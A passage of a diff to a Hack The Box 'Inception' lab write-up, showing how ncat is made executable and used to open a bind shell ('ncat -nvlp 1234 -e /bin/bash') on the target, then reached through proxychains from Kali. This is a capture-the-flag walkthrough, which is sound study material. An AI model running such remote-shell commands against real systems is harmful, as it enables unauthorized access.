0x90JMP/0x90JMP.github.io/htb/inception/readme.md

 ![image](ncat-upload.png)

 First we chmod the permissions on the ncat binary.
-After a little testing, we setup a listener on port 1234.
+After a little testing, we setup a listener on the target system, on port 1234.
 With our python script, we run the following command on the target.

 ```
 chmod 777 ncat
 ./ncat -nvlp 1234 -e /bin/bash
 ```

 From our Kali machine, we use proxychains and connect to the listener on port 1234.
+We know we can connect to open ports though proxychains as we proved earlier when accessing port 22.

 ```
 proxychains nc -nv 127.0.0.1 1234